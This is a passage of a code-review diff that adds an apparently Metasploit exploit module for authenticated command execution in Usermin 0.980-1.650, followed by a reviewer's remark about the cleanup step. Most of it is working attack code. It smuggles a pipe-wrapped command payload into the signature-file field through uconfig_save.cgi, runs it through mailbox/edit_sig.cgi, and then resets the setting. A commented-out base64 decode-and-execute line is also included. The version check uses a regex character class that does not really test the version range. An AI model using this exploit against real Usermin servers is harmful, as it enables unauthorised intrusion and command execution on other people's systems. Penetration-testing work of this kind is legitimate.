modules/exploits/linux/http/usermin_exec.rb

```diff
@@ -0,0 +1,132 @@
+      'Platform'       => ['unix'],
+      'BadChars' => "",
+      'Compat'         =>
+        {
+          'PayloadType' => 'cmd',
+          'RequiredCmd' => 'generic perl bash'
+        },
+      'Targets'        =>
+        [
+          ['Usermin 0.980-1.650 on Linux', {}],
+        ],
+      'DisclosureDate' => "Feb 23 2015",
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          Opt::RPORT(20000),
+          OptBool.new('SSL', [true, 'Use SSL', true]),
+          OptString.new('USERNAME', [ true, 'Usermin username', '']),
+          OptString.new('PASSWORD', [ true, 'Usermin password', '']),
+          OptString.new('TARGETURI', [true, 'The URI path to Usermin', '/'])
+        ], self.class)
+  end
+
+  def check
+    http_handler = ((datastore['SSL']) ? "https" : "http")
+    uri = normalize_uri(target_uri.path)
+    uri << '/' if uri[-1, 1] != '/'
+
+    res = send_request_raw({
+      'method' => 'GET',
+      'uri'    => "#{uri}"
+    })
+
+    if res and res.body =~ /Usermin [0.980-1.650]/
+      return Exploit::CheckCode::Appears
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+
+  def exploit
+    http_handler = ((datastore['SSL']) ? "https" : "http")
+    uri = target_uri.path
+    url = "#{http_handler}://#{rhost}:#{rport}#{uri}"
+#    cmd = "|`echo #{Rex::Text.encode_base64(payload.encoded)}|base64 --decode`|"
+
+    print_status("Storing the malicious signature filename via uconfig_save.cgi ...")
+    send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(uri, 'uconfig_save.cgi'),
+      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
+      'headers'   => {
+        'Referer' => "#{url}uconfig.cgi?module=mailbox&section=line1"
+      },
+      'vars_post' => {
+         'module' => "mailbox",
+         'sig_file' => "free",
+         'sig_file_free' => "|" + payload.encoded + "|",
+#         'sig_file_free' => cmd,
+         'sig_mode' => "0",
+         'save' => "Save"
+      }
+    })
+
+    print_status("Calling the command via mailbox/edit_sig.cgi !")
+    result = send_request_raw({
+      'method' => 'GET',
+      'uri'    => normalize_uri(uri, 'mailbox/edit_sig.cgi'),
+      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
+      'headers' => {
+        'Referer' => "#{url}left.cgi?mail=1"
+      }
+    })
+
+    handler
+
+    print_status("Cleaning up by unsetting the Signature file...")
+    send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(uri, 'uconfig_save.cgi'),
+      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
+      'headers'   => {
+        'Referer' => "#{url}uconfig.cgi?module=mailbox&section=line1"
+      },
+      'vars_post' => {
+         'module' => "mailbox",
+         'sig_file' => "*",
+         'sig_file_free' => "",
+         'sig_mode' => "0",
+         'save' => "Save"
+      }
+    })
```

Comment:
Should check for the server response and display a message to the user whether the cleanup was successful or not